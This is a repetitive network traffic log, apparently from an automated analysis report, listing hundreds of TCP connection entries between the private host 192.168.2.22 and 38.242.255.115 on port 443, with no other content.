Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
